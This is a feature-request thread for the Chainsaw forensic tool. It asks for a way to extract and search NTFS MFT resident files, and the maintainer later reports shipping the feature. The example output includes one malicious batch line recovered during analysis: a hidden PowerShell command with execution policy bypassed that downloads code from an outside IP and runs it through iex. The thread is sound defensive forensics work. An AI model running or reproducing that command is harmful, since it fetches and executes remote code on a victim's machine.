Feature Request: MFT Resident Files

[IppSec]

It would be nice to be able to extract/hunt on MFT Resident Files. I don't believe this would be a big lift as it looks like mft_dump does support it which I think uses the same library Chainsaw uses to dump the MFT.

Example of usefulness:

./mft_dump --extract-resident-streams output/ mft.bin
grep -a -R '\-nop' output/ 2>/dev/null
output/Users_simon.stark_Downloads_Stage-20240213T093324Z-001_Stage_invoice_invoices_invoice.bat__52FBDB017190_0_.dontrun:start /b powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://43.204.110.203:6666/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex"

I'd expect to replace my "grep" with a yara or something.

Hopefully this feature doesn't exist already, I did look through options and search the code for "resident" and didn't come up with anything.

[FranticTyping]

I think there's two parts to this ask:

1.) Extend chainsaw to be able to dump out MFT Resident Files

This should be easy enough, the underlying library supports this we just need to wire it in.

2.) Support String Search / Yara Search on the Resident Files

This might be a little more tricky.

I'll have a look at solving part 1 first, then we can see how much of a lift it will be to add in string/yara search for the streams.

[FranticTyping]

Just updating this thread. I have a locally working solution, I'm just cleaning it up and doing some testing.

[FranticTyping]

@IppSec - The requested features should be available in the latest version of Chainsaw (v2.11.0). You can read about the features here #210

I'll close this issue now, but please let me know if there are additional changes you need!